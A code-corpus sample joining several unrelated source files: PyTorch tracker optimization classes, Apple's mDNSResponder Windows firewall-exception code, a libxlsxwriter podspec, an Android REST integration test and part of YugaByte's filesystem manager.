"thumbnail_url": "https://i.ytimg.com/vi/LHqEKpcA6Mo/hqdefault.jpg",
"title": "Advanced Web Typography",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=LHqEKpcA6Mo"
}
]
}
| 440 |
567 | <gh_stars>100-1000
import torch
import sys
from online import optimization, TensorList, operation
import math
class FactorizedConvProblem(optimization.L2Problem):
def __init__(self, training_samples: TensorList, y: TensorList, filter_reg: torch.Tensor, projection_reg, params, sample_weights: TensorList,
projection_activation, response_activation):
self.training_samples = training_samples
self.y = y
self.filter_reg = filter_reg
self.sample_weights = sample_weights
self.params = params
self.projection_reg = projection_reg
self.projection_activation = projection_activation
self.response_activation = response_activation
self.diag_M = self.filter_reg.concat(projection_reg)
def __call__(self, x: TensorList):
"""
Compute residuals
:param x: [filters, projection_matrices]
:return: [data_terms, filter_regularizations, proj_mat_regularizations]
"""
filter = x[:len(x)//2] # w2 in paper
P = x[len(x)//2:] # w1 in paper
# Do first convolution
compressed_samples = operation.conv1x1(self.training_samples, P).apply(self.projection_activation)
# Do second convolution
residuals = operation.conv2d(compressed_samples, filter, mode='same').apply(self.response_activation)
# Compute data residuals
residuals = residuals - self.y
residuals = self.sample_weights.sqrt().view(-1, 1, 1, 1) * residuals
        # Add regularization for the filter
residuals.extend(self.filter_reg.apply(math.sqrt) * filter)
# Add regularization for projection matrix
residuals.extend(self.projection_reg.apply(math.sqrt) * P)
return residuals
def ip_input(self, a: TensorList, b: TensorList):
num = len(a) // 2 # Number of filters
a_filter = a[:num]
b_filter = b[:num]
a_P = a[num:]
b_P = b[num:]
# Filter inner product
# ip_out = a_filter.reshape(-1) @ b_filter.reshape(-1)
ip_out = operation.conv2d(a_filter, b_filter).view(-1)
# Add projection matrix part
# ip_out += a_P.reshape(-1) @ b_P.reshape(-1)
ip_out += operation.conv2d(a_P.view(1,-1,1,1), b_P.view(1,-1,1,1)).view(-1)
# Have independent inner products for each filter
return ip_out.concat(ip_out.clone())
def M1(self, x: TensorList):
return x / self.diag_M
class ConvProblem(optimization.L2Problem):
def __init__(self, training_samples: TensorList, y: TensorList, filter_reg: torch.Tensor, sample_weights: TensorList, response_activation):
self.training_samples = training_samples
self.y = y
self.filter_reg = filter_reg
self.sample_weights = sample_weights
self.response_activation = response_activation
def __call__(self, x: TensorList):
"""
Compute residuals
:param x: [filters]
:return: [data_terms, filter_regularizations]
"""
# Do convolution and compute residuals
residuals = operation.conv2d(self.training_samples, x, mode='same').apply(self.response_activation)
residuals = residuals - self.y
residuals = self.sample_weights.sqrt().view(-1, 1, 1, 1) * residuals
        # Add regularization for the filter
residuals.extend(self.filter_reg.apply(math.sqrt) * x)
return residuals
def ip_input(self, a: TensorList, b: TensorList):
# return a.reshape(-1) @ b.reshape(-1)
# return (a * b).sum()
return operation.conv2d(a, b).view(-1)
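# Minimal usage sketch (hypothetical shapes and regularization values; assumes the
# TensorList / operation API imported above from `online`):
#
#     samples = TensorList([torch.randn(10, 16, 18, 18)])  # stored training features
#     labels = TensorList([torch.randn(10, 1, 18, 18)])     # desired response maps
#     weights = TensorList([torch.full((10,), 0.1)])
#     reg = TensorList([torch.tensor(1e-2)])
#     problem = ConvProblem(samples, labels, reg, weights, lambda r: r)
#     filt = TensorList([torch.zeros(1, 16, 4, 4)])
#     residuals = problem(filt)  # data residuals followed by the filter regularization term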
| 1,531 |
341 | <reponame>codenotes/mDNAResponder
/* -*- Mode: C; tab-width: 4 -*-
*
* Copyright (c) 2003-2004 Apple Computer, Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// <rdar://problem/4278931> Doesn't compile correctly with latest Platform SDK
#if !defined(_WIN32_DCOM)
# define _WIN32_DCOM
#endif
#include "Firewall.h"
#include <windows.h>
#include <crtdbg.h>
#include <netfw.h>
#include <objbase.h>
#include <oleauto.h>
static const int kMaxTries = 30;
static const int kRetrySleepPeriod = 1 * 1000; // 1 second
static OSStatus
mDNSFirewallInitialize(OUT INetFwProfile ** fwProfile)
{
INetFwMgr * fwMgr = NULL;
INetFwPolicy * fwPolicy = NULL;
int numRetries = 0;
HRESULT err = kNoErr;
_ASSERT(fwProfile != NULL);
*fwProfile = NULL;
// Use COM to get a reference to the firewall settings manager. This
// call will fail on anything other than XP SP2
err = CoCreateInstance( __uuidof(NetFwMgr), NULL, CLSCTX_INPROC_SERVER, __uuidof(INetFwMgr), (void**)&fwMgr );
require(SUCCEEDED(err) && ( fwMgr != NULL ), exit);
// Use the reference to get the local firewall policy
err = fwMgr->get_LocalPolicy(&fwPolicy);
require(SUCCEEDED(err) && ( fwPolicy != NULL ), exit);
// Use the reference to get the extant profile. Empirical evidence
// suggests that there is the potential for a race condition when a system
// service whose startup type is automatic calls this method.
// This is true even when the service declares itself to be dependent
// on the firewall service. Re-trying the method will succeed within
// a few seconds.
do
{
err = fwPolicy->get_CurrentProfile(fwProfile);
if (err)
{
Sleep(kRetrySleepPeriod);
}
}
while (err && (numRetries++ < kMaxTries));
require(SUCCEEDED(err), exit);
err = kNoErr;
exit:
// Release temporary COM objects
if (fwPolicy != NULL)
{
fwPolicy->Release();
}
if (fwMgr != NULL)
{
fwMgr->Release();
}
return err;
}
static void
mDNSFirewallCleanup
(
IN INetFwProfile * fwProfile
)
{
// Call Release on the COM reference.
if (fwProfile != NULL)
{
fwProfile->Release();
}
}
static OSStatus
mDNSFirewallAppIsEnabled
(
IN INetFwProfile * fwProfile,
IN const wchar_t * fwProcessImageFileName,
OUT BOOL * fwAppEnabled
)
{
BSTR fwBstrProcessImageFileName = NULL;
VARIANT_BOOL fwEnabled;
INetFwAuthorizedApplication * fwApp = NULL;
INetFwAuthorizedApplications* fwApps = NULL;
OSStatus err = kNoErr;
_ASSERT(fwProfile != NULL);
_ASSERT(fwProcessImageFileName != NULL);
_ASSERT(fwAppEnabled != NULL);
*fwAppEnabled = FALSE;
// Get the list of authorized applications
err = fwProfile->get_AuthorizedApplications(&fwApps);
require(SUCCEEDED(err) && ( fwApps != NULL ), exit);
fwBstrProcessImageFileName = SysAllocString(fwProcessImageFileName);
require_action( ( fwProcessImageFileName != NULL ) && ( SysStringLen(fwBstrProcessImageFileName) > 0 ), exit, err = kNoMemoryErr);
// Look for us
err = fwApps->Item(fwBstrProcessImageFileName, &fwApp);
if (SUCCEEDED(err) && ( fwApp != NULL ) )
{
// It's listed, but is it enabled?
err = fwApp->get_Enabled(&fwEnabled);
require(SUCCEEDED(err), exit);
if (fwEnabled != VARIANT_FALSE)
{
// Yes, it's enabled
*fwAppEnabled = TRUE;
}
}
err = kNoErr;
exit:
// Deallocate the BSTR
if ( fwBstrProcessImageFileName != NULL )
{
SysFreeString(fwBstrProcessImageFileName);
}
// Release the COM objects
if (fwApp != NULL)
{
fwApp->Release();
}
if (fwApps != NULL)
{
fwApps->Release();
}
return err;
}
static OSStatus
mDNSFirewallAddApp
(
IN INetFwProfile * fwProfile,
IN const wchar_t * fwProcessImageFileName,
IN const wchar_t * fwName
)
{
BOOL fwAppEnabled;
BSTR fwBstrName = NULL;
BSTR fwBstrProcessImageFileName = NULL;
INetFwAuthorizedApplication * fwApp = NULL;
INetFwAuthorizedApplications* fwApps = NULL;
OSStatus err = S_OK;
_ASSERT(fwProfile != NULL);
_ASSERT(fwProcessImageFileName != NULL);
_ASSERT(fwName != NULL);
// First check to see if the application is already authorized.
err = mDNSFirewallAppIsEnabled( fwProfile, fwProcessImageFileName, &fwAppEnabled );
require_noerr(err, exit);
// Only add the application if it isn't enabled
if (!fwAppEnabled)
{
// Get the list of authorized applications
err = fwProfile->get_AuthorizedApplications(&fwApps);
require(SUCCEEDED(err) && ( fwApps != NULL ), exit);
// Create an instance of an authorized application.
err = CoCreateInstance( __uuidof(NetFwAuthorizedApplication), NULL, CLSCTX_INPROC_SERVER, __uuidof(INetFwAuthorizedApplication), (void**)&fwApp );
require(SUCCEEDED(err) && ( fwApp != NULL ), exit);
fwBstrProcessImageFileName = SysAllocString(fwProcessImageFileName);
require_action(( fwProcessImageFileName != NULL ) && ( SysStringLen(fwBstrProcessImageFileName) > 0 ), exit, err = kNoMemoryErr);
// Set the executable file name
err = fwApp->put_ProcessImageFileName(fwBstrProcessImageFileName);
require(SUCCEEDED(err), exit);
fwBstrName = SysAllocString(fwName);
require_action( ( fwBstrName != NULL ) && ( SysStringLen(fwBstrName) > 0 ), exit, err = kNoMemoryErr);
// Set the friendly name
err = fwApp->put_Name(fwBstrName);
require(SUCCEEDED(err), exit);
// Now add the application
err = fwApps->Add(fwApp);
require(SUCCEEDED(err), exit);
}
err = kNoErr;
exit:
// Deallocate the BSTR objects
if ( fwBstrName != NULL )
{
SysFreeString(fwBstrName);
}
if ( fwBstrProcessImageFileName != NULL )
{
SysFreeString(fwBstrProcessImageFileName);
}
// Release the COM objects
if (fwApp != NULL)
{
fwApp->Release();
}
if (fwApps != NULL)
{
fwApps->Release();
}
return err;
}
static OSStatus
mDNSFirewallIsFileAndPrintSharingEnabled
(
IN INetFwProfile * fwProfile,
OUT BOOL * fwServiceEnabled
)
{
VARIANT_BOOL fwEnabled;
INetFwService* fwService = NULL;
INetFwServices* fwServices = NULL;
OSStatus err = S_OK;
_ASSERT(fwProfile != NULL);
_ASSERT(fwServiceEnabled != NULL);
*fwServiceEnabled = FALSE;
// Retrieve the globally open ports collection.
err = fwProfile->get_Services(&fwServices);
require( SUCCEEDED( err ), exit );
// Attempt to retrieve the globally open port.
err = fwServices->Item(NET_FW_SERVICE_FILE_AND_PRINT, &fwService);
require( SUCCEEDED( err ), exit );
// Find out if the globally open port is enabled.
err = fwService->get_Enabled(&fwEnabled);
require( SUCCEEDED( err ), exit );
if (fwEnabled != VARIANT_FALSE)
{
*fwServiceEnabled = TRUE;
}
exit:
// Release the globally open port.
if (fwService != NULL)
{
fwService->Release();
}
// Release the globally open ports collection.
if (fwServices != NULL)
{
fwServices->Release();
}
return err;
}
OSStatus
mDNSAddToFirewall
(
LPWSTR executable,
LPWSTR name
)
{
INetFwProfile * fwProfile = NULL;
HRESULT comInit = E_FAIL;
OSStatus err = kNoErr;
// Initialize COM.
comInit = CoInitializeEx( 0, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE );
// Ignore this case. RPC_E_CHANGED_MODE means that COM has already been
// initialized with a different mode.
if (comInit != RPC_E_CHANGED_MODE)
{
err = comInit;
require(SUCCEEDED(err), exit);
}
// Connect to the firewall
err = mDNSFirewallInitialize(&fwProfile);
require( SUCCEEDED( err ) && ( fwProfile != NULL ), exit);
// Add us to the list of exempt programs
err = mDNSFirewallAddApp( fwProfile, executable, name );
require_noerr(err, exit);
exit:
// Disconnect from the firewall
if ( fwProfile != NULL )
{
mDNSFirewallCleanup(fwProfile);
}
// De-initialize COM
if (SUCCEEDED(comInit))
{
CoUninitialize();
}
return err;
}
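// Usage sketch (hypothetical executable path and display name, for illustration only):
//
//     wchar_t exePath[] = L"C:\\Program Files\\Bonjour\\mDNSResponder.exe";
//     wchar_t appName[] = L"Bonjour Service";
//     OSStatus status = mDNSAddToFirewall(exePath, appName);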
BOOL
mDNSIsFileAndPrintSharingEnabled( BOOL * retry )
{
INetFwProfile * fwProfile = NULL;
HRESULT comInit = E_FAIL;
BOOL enabled = FALSE;
OSStatus err = kNoErr;
// Initialize COM.
*retry = FALSE;
comInit = CoInitializeEx( 0, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE );
// Ignore this case. RPC_E_CHANGED_MODE means that COM has already been
// initialized with a different mode.
if (comInit != RPC_E_CHANGED_MODE)
{
*retry = TRUE;
err = comInit;
require(SUCCEEDED(err), exit);
}
// Connect to the firewall
err = mDNSFirewallInitialize(&fwProfile);
require( SUCCEEDED( err ) && ( fwProfile != NULL ), exit);
err = mDNSFirewallIsFileAndPrintSharingEnabled( fwProfile, &enabled );
require_noerr( err, exit );
exit:
// Disconnect from the firewall
if ( fwProfile != NULL )
{
mDNSFirewallCleanup(fwProfile);
}
// De-initialize COM
if (SUCCEEDED(comInit))
{
CoUninitialize();
}
return enabled;
}
| 3,794 |
5,169 | <reponame>Gantios/Specs
{
"name": "libxlsxwriter",
"version": "0.7.8",
"summary": "Libxlsxwriter: A C library for creating Excel XLSX files.",
"platforms": {
"ios": "6.0",
"osx": "10.8"
},
"description": "Libxlsxwriter is a C library that can be used to write text, numbers, formulas and hyperlinks to multiple worksheets in an Excel 2007+ XLSX file.\n\nIt supports features such as:\n\n* 100% compatible Excel XLSX files.\n* Full Excel formatting.\n* Merged cells.\n* Defined names.\n* Autofilters.\n* Charts.\n* Data validation and drop down lists.\n* Worksheet PNG/JPEG images.\n* Memory optimisation mode for writing large files.\n* Source code available on [GitHub](https://github.com/jmcnamara/libxlsxwriter).\n* FreeBSD license.\n* ANSI C.\n* Works with GCC, Clang, Xcode, MSVC 2015, ICC, TCC, MinGW, MingGW-w64/32.\n* Works on Linux, FreeBSD, OpenBSD, OS X, iOS and Windows. Also works on MSYS/MSYS2 and Cygwin.\n* Compiles for 32 and 64 bit.\n* Compiles and works on big and little endian systems.\n* The only dependency is on `zlib`.",
"homepage": "http://libxlsxwriter.github.io",
"documentation_url": "http://libxlsxwriter.github.io",
"license": "FreeBSD",
"authors": {
"<NAME>": "<EMAIL>"
},
"source": {
"git": "https://github.com/jmcnamara/libxlsxwriter.git",
"tag": "RELEASE_0.7.8"
},
"source_files": [
"src/**/*.c",
"third_party/**/{zip.c,ioapi.c,tmpfileplus.c}",
"include/**/*.h"
],
"header_dir": "xlsxwriter",
"header_mappings_dir": "include",
"libraries": "z",
"compiler_flags": [
"-DNOCRYPT=1",
"-DNOUNCRYPT=1"
],
"pod_target_xcconfig": {
"USER_HEADER_SEARCH_PATHS": "${PODS_ROOT}/libxlsxwriter/include"
},
"module_map": "cocoapods/libxlsxwriter.modulemap",
"prepare_command": "cp cocoapods/libxlsxwriter-umbrella.h include/xlsxwriter/libxlsxwriter-umbrella.h"
}
| 751 |
1,974 | package com.artemzin.qualitymatters.integration_tests.api;
import com.artemzin.qualitymatters.QualityMattersIntegrationRobolectricTestRunner;
import com.artemzin.qualitymatters.api.QualityMattersRestApi;
import com.artemzin.qualitymatters.api.entities.Item;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import java.io.IOException;
import java.util.List;
import okhttp3.mockwebserver.MockResponse;
import okhttp3.mockwebserver.MockWebServer;
import retrofit2.adapter.rxjava.HttpException;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.fail;
/**
* Main purpose of Integration tests is to check that all layers of your app work correctly, for example:
* <ul>
* <li>Http layer</li>
* <li>REST layer</li>
* <li>Parsing/Serializing layer</li>
* <li>Execution layer (ie RxJava)</li>
* </ul>
*/
@RunWith(QualityMattersIntegrationRobolectricTestRunner.class)
public class QualityMattersRestApiIntegrationTest {
private MockWebServer mockWebServer;
private QualityMattersRestApi qualityMattersRestApi;
@Before
public void beforeEachTest() throws IOException {
mockWebServer = new MockWebServer();
mockWebServer.start();
// Change base url to the mocked
QualityMattersIntegrationRobolectricTestRunner.qualityMattersApp().applicationComponent().changeableBaseUrl().setBaseUrl(mockWebServer.url("").toString());
qualityMattersRestApi = QualityMattersIntegrationRobolectricTestRunner.qualityMattersApp().applicationComponent().qualityMattersApi();
}
@After
public void afterEachTest() throws IOException {
mockWebServer.shutdown();
}
@Test
public void items_shouldHandleCorrectResponse() {
mockWebServer.enqueue(new MockResponse().setBody("["
+ "{ \"id\": \"test_id_1\", \"image_preview_url\": \"https://url1\", \"title\": \"Test title 1\", \"short_description\": \"Short desc 1\"},"
+ "{ \"id\": \"test_id_2\", \"image_preview_url\": \"https://url2\", \"title\": \"Test title 2\", \"short_description\": \"Short desc 2\"},"
+ "{ \"id\": \"test_id_3\", \"image_preview_url\": \"https://url3\", \"title\": \"Test title 3\", \"short_description\": \"Short desc 3\"}"
+ "]"));
// Get items from the API
List<Item> items = qualityMattersRestApi.items().toBlocking().value();
assertThat(items).hasSize(3);
assertThat(items.get(0).id()).isEqualTo("test_id_1");
assertThat(items.get(0).imagePreviewUrl()).isEqualTo("https://url1");
assertThat(items.get(0).title()).isEqualTo("Test title 1");
assertThat(items.get(0).shortDescription()).isEqualTo("Short desc 1");
assertThat(items.get(1).id()).isEqualTo("test_id_2");
assertThat(items.get(1).imagePreviewUrl()).isEqualTo("https://url2");
assertThat(items.get(1).title()).isEqualTo("Test title 2");
assertThat(items.get(1).shortDescription()).isEqualTo("Short desc 2");
assertThat(items.get(2).id()).isEqualTo("test_id_3");
assertThat(items.get(2).imagePreviewUrl()).isEqualTo("https://url3");
assertThat(items.get(2).title()).isEqualTo("Test title 3");
assertThat(items.get(2).shortDescription()).isEqualTo("Short desc 3");
}
// Such tests assert that no matter how we implement our REST api:
// Retrofit or not
// OkHttp or not
// It should handle error responses too.
@Test
public void items_shouldThrowExceptionIfWebServerRespondError() {
for (Integer errorCode : HttpCodes.clientAndServerSideErrorCodes()) {
mockWebServer.enqueue(new MockResponse().setStatus("HTTP/1.1 " + errorCode + " Not today"));
try {
qualityMattersRestApi.items().toBlocking().value();
fail("HttpException should be thrown for error code: " + errorCode);
} catch (RuntimeException expected) {
HttpException httpException = (HttpException) expected.getCause();
assertThat(httpException.code()).isEqualTo(errorCode);
assertThat(httpException.message()).isEqualTo("Not today");
}
}
}
}
| 1,623 |
2,759 | // Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
//
// The following only applies to changes made to this file as part of YugaByte development.
//
// Portions Copyright (c) YugaByte, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under the License
// is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
// or implied. See the License for the specific language governing permissions and limitations
// under the License.
//
#include "yb/fs/fs_manager.h"
#include <map>
#include <set>
#include <unordered_set>
#include <boost/algorithm/string/predicate.hpp>
#include <boost/preprocessor/cat.hpp>
#include <glog/logging.h>
#include <glog/stl_logging.h>
#include <google/protobuf/message.h>
#include "yb/fs/fs.pb.h"
#include "yb/gutil/map-util.h"
#include "yb/gutil/strings/join.h"
#include "yb/gutil/strings/numbers.h"
#include "yb/gutil/strings/split.h"
#include "yb/gutil/strings/strip.h"
#include "yb/gutil/strings/util.h"
#include "yb/gutil/walltime.h"
#include "yb/util/debug-util.h"
#include "yb/util/env_util.h"
#include "yb/util/flag_tags.h"
#include "yb/util/format.h"
#include "yb/util/metric_entity.h"
#include "yb/util/net/net_util.h"
#include "yb/util/oid_generator.h"
#include "yb/util/path_util.h"
#include "yb/util/pb_util.h"
#include "yb/util/result.h"
DEFINE_bool(enable_data_block_fsync, true,
"Whether to enable fsync() of data blocks, metadata, and their parent directories. "
"Disabling this flag may cause data loss in the event of a system crash.");
TAG_FLAG(enable_data_block_fsync, unsafe);
DECLARE_string(fs_data_dirs);
DEFINE_string(fs_wal_dirs, "",
"Comma-separated list of directories for write-ahead logs. This is an optional "
"argument. If this is not specified, fs_data_dirs is used for write-ahead logs "
"also and that's a reasonable default for most use cases.");
TAG_FLAG(fs_wal_dirs, stable);
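// Example flag values (hypothetical paths, for illustration only):
//   --fs_data_dirs=/mnt/d0,/mnt/d1 --fs_wal_dirs=/mnt/wal
// When --fs_wal_dirs is left empty, write-ahead logs are placed under the
// --fs_data_dirs directories (see FsManagerOpts below).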
DEFINE_string(instance_uuid_override, "",
"When creating local instance metadata (for master or tserver) in an empty data "
"directory, use this UUID instead of randomly-generated one. Can be used to replace "
"a node that had its disk wiped in some scenarios.");
DEFINE_test_flag(bool, simulate_fs_create_failure, false,
"Simulate failure during initial creation of fs during the first time "
"process creation.");
METRIC_DEFINE_entity(drive);
METRIC_DEFINE_counter(drive, drive_fault,
"Drive Fault. Tablet Server isn't able to read/write on this drive.",
yb::MetricUnit::kUnits,
"Drive Fault. Tablet Server isn't able to read/write on this drive.");
using google::protobuf::Message;
using yb::env_util::ScopedFileDeleter;
using std::map;
using std::unordered_set;
using strings::Substitute;
namespace yb {
// ==========================================================================
// FS Paths
// ==========================================================================
const char *FsManager::kWalDirName = "wals";
const char *FsManager::kWalFileNamePrefix = "wal";
const char *FsManager::kWalsRecoveryDirSuffix = ".recovery";
const char *FsManager::kRocksDBDirName = "rocksdb";
const char *FsManager::kDataDirName = "data";
namespace {
const char kRaftGroupMetadataDirName[] = "tablet-meta";
const char kInstanceMetadataFileName[] = "instance";
const char kFsLockFileName[] = "fs-lock";
const char kConsensusMetadataDirName[] = "consensus-meta";
const char kLogsDirName[] = "logs";
const char kTmpInfix[] = ".tmp";
const char kCheckFileTemplate[] = "check.XXXXXX";
const char kSecureCertsDirName[] = "certs";
const char kPrefixMetricId[] = "drive:";
std::string DataDir(const std::string& root, const std::string& server_type) {
return JoinPathSegments(GetServerTypeDataPath(root, server_type), FsManager::kDataDirName);
}
std::string WalDir(const std::string& root, const std::string& server_type) {
return JoinPathSegments(GetServerTypeDataPath(root, server_type), FsManager::kWalDirName);
}
} // namespace
FsManagerOpts::FsManagerOpts()
: read_only(false) {
if (FLAGS_fs_wal_dirs.empty() && !FLAGS_fs_data_dirs.empty()) {
// It is sufficient if user sets the data dirs. By default we use the same
// directories for WALs as well.
FLAGS_fs_wal_dirs = FLAGS_fs_data_dirs;
}
wal_paths = strings::Split(FLAGS_fs_wal_dirs, ",", strings::SkipEmpty());
data_paths = strings::Split(FLAGS_fs_data_dirs, ",", strings::SkipEmpty());
}
FsManagerOpts::~FsManagerOpts() = default;
FsManagerOpts::FsManagerOpts(const FsManagerOpts&) = default;
FsManagerOpts& FsManagerOpts::operator=(const FsManagerOpts&) = default;
FsManager::FsManager(Env* env, const string& root_path, const std::string& server_type)
: env_(DCHECK_NOTNULL(env)),
read_only_(false),
wal_fs_roots_({ root_path }),
data_fs_roots_({ root_path }),
server_type_(server_type),
metric_registry_(nullptr),
initted_(false) {
}
FsManager::FsManager(Env* env,
const FsManagerOpts& opts)
: env_(DCHECK_NOTNULL(env)),
read_only_(opts.read_only),
wal_fs_roots_(opts.wal_paths),
data_fs_roots_(opts.data_paths),
server_type_(opts.server_type),
metric_registry_(opts.metric_registry),
parent_mem_tracker_(opts.parent_mem_tracker),
initted_(false) {
}
FsManager::~FsManager() {
}
Status FsManager::Init() {
if (initted_) {
return Status::OK();
}
  // The data root must be set.
if (data_fs_roots_.empty()) {
return STATUS(IOError, "List of data directories (fs_data_dirs) not provided");
}
// Deduplicate all of the roots.
set<string> all_roots;
for (const string& wal_fs_root : wal_fs_roots_) {
all_roots.insert(wal_fs_root);
}
for (const string& data_fs_root : data_fs_roots_) {
all_roots.insert(data_fs_root);
}
// Build a map of original root --> canonicalized root, sanitizing each
// root a bit as we go.
typedef map<string, string> RootMap;
RootMap canonicalized_roots;
for (const string& root : all_roots) {
if (root.empty()) {
return STATUS(IOError, "Empty string provided for filesystem root");
}
if (root[0] != '/') {
return STATUS(IOError,
Substitute("Relative path $0 provided for filesystem root", root));
}
{
string root_copy = root;
StripWhiteSpace(&root_copy);
if (root != root_copy) {
return STATUS(IOError,
Substitute("Filesystem root $0 contains illegal whitespace", root));
}
}
// Strip the basename when canonicalizing, as it may not exist. The
// dirname, however, must exist.
string canonicalized;
Status s = env_->Canonicalize(DirName(root), &canonicalized);
if (!s.ok()) {
return STATUS(
InvalidArgument, strings::Substitute(
"Cannot create directory for YB data, please check the --fs_data_dirs parameter "
"(Passed: $0). Path does not exist: $1\nDetails: $2",
FLAGS_fs_data_dirs, root, s.ToString()));
}
canonicalized = JoinPathSegments(canonicalized, BaseName(root));
InsertOrDie(&canonicalized_roots, root, canonicalized);
}
// All done, use the map to set the canonicalized state.
for (const auto& wal_fs_root : wal_fs_roots_) {
canonicalized_wal_fs_roots_.insert(FindOrDie(canonicalized_roots, wal_fs_root));
}
if (!data_fs_roots_.empty()) {
canonicalized_default_fs_root_ = FindOrDie(canonicalized_roots, data_fs_roots_[0]);
for (const string& data_fs_root : data_fs_roots_) {
canonicalized_data_fs_roots_.insert(FindOrDie(canonicalized_roots, data_fs_root));
}
} else {
LOG(FATAL) << "Data directories (fs_data_dirs) must be specified";
}
for (const RootMap::value_type& e : canonicalized_roots) {
canonicalized_all_fs_roots_.insert(e.second);
}
if (VLOG_IS_ON(1)) {
VLOG(1) << "WAL roots: " << canonicalized_wal_fs_roots_;
VLOG(1) << "Metadata root: " << canonicalized_default_fs_root_;
VLOG(1) << "Data roots: " << canonicalized_data_fs_roots_;
VLOG(1) << "All roots: " << canonicalized_all_fs_roots_;
}
initted_ = true;
return Status::OK();
}
Status FsManager::CheckAndOpenFileSystemRoots() {
RETURN_NOT_OK(Init());
if (HasAnyLockFiles()) {
return STATUS(Corruption, "Lock file is present, filesystem may be in inconsistent state");
}
bool create_roots = false;
for (const string& root : canonicalized_all_fs_roots_) {
auto pb = std::make_unique<InstanceMetadataPB>();
auto read_result = pb_util::ReadPBContainerFromPath(env_, GetInstanceMetadataPath(root),
pb.get());
auto write_result = CheckWrite(root);
if ((!read_result.ok() && !read_result.IsNotFound()) || !write_result.ok()) {
LOG(WARNING) << "Path: " << root << " Read Result: "<< read_result
<< " Write Result: " << write_result;
canonicalized_wal_fs_roots_.erase(root);
canonicalized_data_fs_roots_.erase(root);
CreateAndSetFaultDriveMetric(root);
continue;
}
if (read_result.IsNotFound()) {
create_roots = true;
continue;
}
if (!metadata_) {
metadata_.reset(pb.release());
} else if (pb->uuid() != metadata_->uuid()) {
return STATUS(Corruption, Substitute(
"Mismatched UUIDs across filesystem roots: $0 vs. $1",
metadata_->uuid(), pb->uuid()));
}
}
if (!metadata_) {
return STATUS(NotFound, "Metadata wasn't found");
}
if (create_roots) {
RETURN_NOT_OK(CreateFileSystemRoots(*metadata_.get()));
}
for (const auto& dir : GetAncillaryDirs()) {
bool created;
RETURN_NOT_OK(CreateDirIfMissingAndSync(dir, &created));
if (created) {
LOG(INFO) << dir << " was created";
}
}
LOG(INFO) << "Opened local filesystem: " << JoinStrings(canonicalized_all_fs_roots_, ",")
<< std::endl << metadata_->DebugString();
return Status::OK();
}
bool FsManager::HasAnyLockFiles() {
for (const string& root : canonicalized_all_fs_roots_) {
if (Exists(GetFsLockFilePath(root))) {
LOG(INFO) << "Found lock file in dir " << root;
return true;
}
}
return false;
}
Status FsManager::DeleteLockFiles() {
CHECK(!read_only_);
vector<string> removal_list;
for (const string& root : canonicalized_all_fs_roots_) {
std::string lock_file_path = GetFsLockFilePath(root);
if (Exists(lock_file_path)) {
removal_list.push_back(lock_file_path);
}
}
for (const string& target : removal_list) {
RETURN_NOT_OK_PREPEND(env_->DeleteFile(target), "Lock file delete failed");
}
return Status::OK();
}
Status FsManager::DeleteFileSystemLayout(ShouldDeleteLogs also_delete_logs) {
CHECK(!read_only_);
set<string> removal_set;
if (also_delete_logs) {
removal_set = canonicalized_all_fs_roots_;
} else {
auto removal_list = GetWalRootDirs();
AppendValues(GetRaftGroupMetadataDirs(), &removal_list);
AppendValues(GetConsensusMetadataDirs(), &removal_list);
for (const string& root : canonicalized_all_fs_roots_) {
removal_list.push_back(GetInstanceMetadataPath(root));
}
auto data_dirs = GetDataRootDirs();
removal_list.insert(removal_list.begin(), data_dirs.begin(), data_dirs.end());
removal_set.insert(removal_list.begin(), removal_list.end());
}
for (const string& target : removal_set) {
bool is_dir = false;
Status s = env_->IsDirectory(target, &is_dir);
if (!s.ok()) {
LOG(WARNING) << "Error: " << s.ToString() << " when checking if " << target
<< " is a directory.";
continue;
}
if (is_dir) {
RETURN_NOT_OK(env_->DeleteRecursively(target));
} else {
RETURN_NOT_OK(env_->DeleteFile(target));
}
}
RETURN_NOT_OK(DeleteLockFiles());
return Status::OK();
}
Status FsManager::CreateInitialFileSystemLayout(bool delete_fs_if_lock_found) {
CHECK(!read_only_);
RETURN_NOT_OK(Init());
bool fs_cleaned = false;
// If lock file is present, delete existing filesystem layout before continuing.
if (delete_fs_if_lock_found && HasAnyLockFiles()) {
RETURN_NOT_OK(DeleteFileSystemLayout());
fs_cleaned = true;
}
// It's OK if a root already exists as long as there's nothing in it.
for (const string& root : canonicalized_all_fs_roots_) {
if (!env_->FileExists(GetServerTypeDataPath(root, server_type_))) {
// We'll create the directory below.
continue;
}
bool is_empty;
RETURN_NOT_OK_PREPEND(IsDirectoryEmpty(GetServerTypeDataPath(root, server_type_), &is_empty),
"Unable to check if FSManager root is empty");
if (!is_empty) {
return STATUS(AlreadyPresent, "FSManager root is not empty", root);
}
}
// All roots are either empty or non-existent. Create missing roots and all
// subdirectories.
//
InstanceMetadataPB metadata;
CreateInstanceMetadata(&metadata);
RETURN_NOT_OK(CreateFileSystemRoots(metadata,
/* create_lock = */ fs_cleaned));
if (FLAGS_TEST_simulate_fs_create_failure) {
return STATUS(IOError, "Simulated fs creation error");
}
